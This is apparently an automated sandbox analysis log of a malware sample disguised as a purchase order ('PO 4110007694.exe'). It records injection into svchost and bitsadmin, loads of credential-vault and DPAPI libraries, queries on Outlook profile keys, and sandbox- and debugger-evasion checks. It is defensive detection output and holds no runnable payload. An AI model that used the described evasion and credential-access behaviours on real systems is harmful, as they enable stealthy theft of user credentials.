                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO 4110007694.exeStatic file information: File size 1212928 > 1048576
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PO 4110007694.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hLRGQqcplWvpUw.exe, 00000002.00000000.1806902391.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4113682145.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
                Source: PO 4110007694.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PO 4110007694.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PO 4110007694.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PO 4110007694.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PO 4110007694.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7848F push FFFFFF8Bh; iretd 0_2_00C78491
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C306FE push es; ret 0_2_00C3070B
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3E70F push edi; ret 0_2_00C3E711
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3070E push es; ret 0_2_00C3070F
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C30710 push es; ret 0_2_00C3071B
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C30720 push es; ret 0_2_00C30723
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C30724 push es; ret 0_2_00C30727
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3072A push es; ret 0_2_00C30733
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C30734 push es; ret 0_2_00C30737
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C30739 push es; ret 0_2_00C30753
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3E828 push esi; ret 0_2_00C3E82A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C38945 push ecx; ret 0_2_00C38958
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3EAEC push edi; ret 0_2_00C3EAEE
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3EA03 push esi; ret 0_2_00C3EA05
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C32BDC push ds; ret 0_2_00C32BE2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C253ED push edx; retn 0000h0_2_00C253EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402055 push edx; iretd 1_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004018A1 push edx; iretd 1_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414930 push eax; retf 1_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181E4 push ds; retf 1_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040218B push ebp; iretd 1_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D9B6 push FFFFFFEBh; iretd 1_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041AA30 push edx; retf 1_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004192F1 push edx; ret 1_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00425433 push edi; ret 1_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403570 push eax; ret 1_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414658 push esp; ret 1_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414E8B pushfd ; iretd 1_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A7C3 push edi; ret 1_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D7CA push ecx; ret 1_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C148D7
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C95376
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C33187
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\PO 4110007694.exeAPI/Special instruction interceptor: Address: 17E1F04
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: PO 4110007694.exe, 00000000.00000002.1656484952.0000000001896000.00000004.00000020.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1646634074.0000000001896000.00000004.00000020.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1646534576.000000000182A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEA"O
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 9682Jump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep count: 291 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep time: -582000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep count: 9682 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep time: -19364000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B9C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02B9C640
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4114577228.00000000010FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EE2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2180800002.000002DA996CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B23 LdrLoadDll,1_2_00417B23
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C83F09 BlockInput,0_2_00C83F09
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C45A7C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E2170 mov eax, dword ptr fs:[00000030h]0_2_017E2170
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E21D0 mov eax, dword ptr fs:[00000030h]0_2_017E21D0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E0B60 mov eax, dword ptr fs:[00000030h]0_2_017E0B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
